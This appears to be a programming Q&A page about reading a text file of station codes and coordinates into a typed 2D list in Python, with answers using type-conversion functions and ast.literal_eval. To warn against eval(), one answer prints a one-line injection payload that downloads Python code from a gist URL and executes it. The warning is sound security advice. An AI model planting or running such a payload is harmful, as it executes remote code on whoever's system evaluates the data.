How do I parse a file into a 2d array while supporting data types in Python?

I am new to programming. I want to read a data file and store it as a 2d array in python3 so that I can work with individual items. I am using the following method to read in a file:

with open("text.txt", "r") as text:
    lines = [line.split() for line in text]

      

However, this parses everything as text. How can I read in a file while preserving data types (text as str, integers as int, floats as float, etc.)? The input file looks like this:

HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714

      



2 answers


Usually, you know in advance which type of data to expect in each row, column, or cell. In your case, the first cell of every row is a string and all the remaining cells are numbers.

data = []
with open('text.txt', 'r') as fp:
  for line in (l.split() for l in fp):
    line[1:] = [float(x) for x in line[1:]]
    data.append(line)
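
If the layout may change later, the same idea can be written with one converter per column. This is only a sketch: COLUMN_TYPES and parse_rows are names I made up for illustration, and io.StringIO stands in for the opened file so the snippet runs without text.txt.

```python
import io

# Two rows copied from the question; io.StringIO stands in for open("text.txt").
SAMPLE = """\
HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
"""

# Hypothetical schema: one converter per column, in file order.
COLUMN_TYPES = (str, float, float, float)


def parse_rows(fp, column_types=COLUMN_TYPES):
    """Split each non-empty line on whitespace and convert it cell by cell."""
    rows = []
    for line in fp:
        cells = line.split()
        if not cells:
            continue  # skip blank lines
        if len(cells) != len(column_types):
            raise ValueError(f"expected {len(column_types)} cells: {line!r}")
        rows.append([convert(cell) for convert, cell in zip(column_types, cells)])
    return rows


rows = parse_rows(io.StringIO(SAMPLE))
print(rows[0])  # ['HNUS', 4973168.84, 1734085.512, -3585434.051]
```

A row with the wrong number of cells raises an error here instead of being converted silently, which is usually what you want for fixed-format data.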

      

If you really want to convert every cell to the closest applicable data type, you can use a function like this and apply it to every cell in a 2D list.



def nearest_applicable_conversion(x):
  try:
    return int(x)
  except ValueError:
    pass
  try:
    return float(x)
  except ValueError:
    pass
  return x
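
Applying it to every cell could look roughly like this. The function is repeated in a compact form so the snippet runs on its own, and the 42 cell is made up to show the int branch; the question's data has no integers.

```python
def nearest_applicable_conversion(x):
    # Same logic as the function above: try int, then float, else keep the text.
    for convert in (int, float):
        try:
            return convert(x)
        except ValueError:
            pass
    return x


# Lines as they would come out of the file; the "42" cell is invented.
lines = [
    "HNUS 4973168.840 1734085.512 -3585434.051",
    "PRET 42 2724721.031 -2752950.762",
]

# Nested comprehension: outer loop over lines, inner loop over cells.
data = [[nearest_applicable_conversion(cell) for cell in line.split()] for line in lines]

print(data[1])  # ['PRET', 42, 2724721.031, -2752950.762]
```

One caveat: float() also accepts spellings such as "nan" and "inf" in any letter case, so a text cell that happens to read NAN or INF would come back as a float rather than a string.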

      

I strongly discourage using eval(), as it will evaluate any valid Python code and makes your system vulnerable to attacks by those who know how. I could easily execute arbitrary code by putting the following code in one of the cells that you eval() from text.txt; I just have to make sure it doesn't contain spaces, because they would split the code into multiple cells:

(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()
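
To see the difference without running anything dangerous, here is a small sketch with a harmless stand-in cell. The cell content is my own example, not something from the question; it only asks the os module for the current directory.

```python
import os

# A harmless stand-in for a malicious cell: no spaces, but still a complete
# Python expression that imports a module and calls a function.
cell = "__import__('os').getcwd()"

# eval() executes the expression: both the import and the call happen.
evaluated = eval(cell)

# float() only parses numbers; anything else is rejected, nothing is executed.
try:
    float(cell)
    outcome = "converted"
except ValueError:
    outcome = "rejected"

print(evaluated == os.getcwd())  # True
print(outcome)                   # rejected
```

The try/except conversions treat the cell purely as text to be parsed, so the worst case is a ValueError and the cell staying a string.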

      



Is this what you want?

import ast
with open("1.txt","r") as inp:
    c = [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split()]

      

output:

print(c)
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print(c[1], type(c[1]))
4973168.84 <class 'float'>

      

You cannot apply ast.literal_eval() directly to the text cells. It expects a valid Python literal, so a bare, unquoted word is rejected, while a quoted string is accepted and comes back with its quotes stripped:



ast.literal_eval("as")
File "<unknown>", line 1
    as
    ^
SyntaxError: unexpected EOF while parsing


ast.literal_eval('"as"')
'as'
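
The isalpha() check only covers names made of letters. A name such as ST01 is not purely alphabetic, so it would be passed to ast.literal_eval() and raise an error. One possible alternative, sketched here with a helper name (literal_or_text) and sample values I invented, is to try the literal first and fall back to the text:

```python
import ast


def literal_or_text(token):
    """Return the Python literal that `token` spells, or the token itself."""
    try:
        return ast.literal_eval(token)
    except (ValueError, SyntaxError):
        # Not a literal (for example a bare name such as HNUS or ST01): keep the text.
        return token


# Invented line: a name containing digits, plus one integer cell.
line = "ST01 4973168.840 17 -3585434.051"
row = [literal_or_text(token) for token in line.split()]

print(row)  # ['ST01', 4973168.84, 17, -3585434.051]
```

Keep in mind that cells spelling other literals, such as True or None, would be converted as well, which may or may not be what you want.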

      

Edit:

To get it as a 2-dimensional array:

import ast
with open("1.txt","r") as inp:
    c = [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split()] for line in inp]

      

output:

print(c)
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]
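
Once the data is a list of rows, individual items are reached with two indices, and zip(*rows) gives you the columns. A short sketch using two of the rows above; the variable names are my own:

```python
rows = [
    ['HNUS', 4973168.84, 1734085.512, -3585434.051],
    ['PRET', 5064032.237, 2724721.031, -2752950.762],
]

name = rows[0][0]    # first cell of the first row
value = rows[1][1]   # second cell of the second row

# zip(*rows) transposes the list of rows into a sequence of columns.
names, col1, col2, col3 = zip(*rows)

print(name, value)  # HNUS 5064032.237
print(names)        # ('HNUS', 'PRET')
```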

      
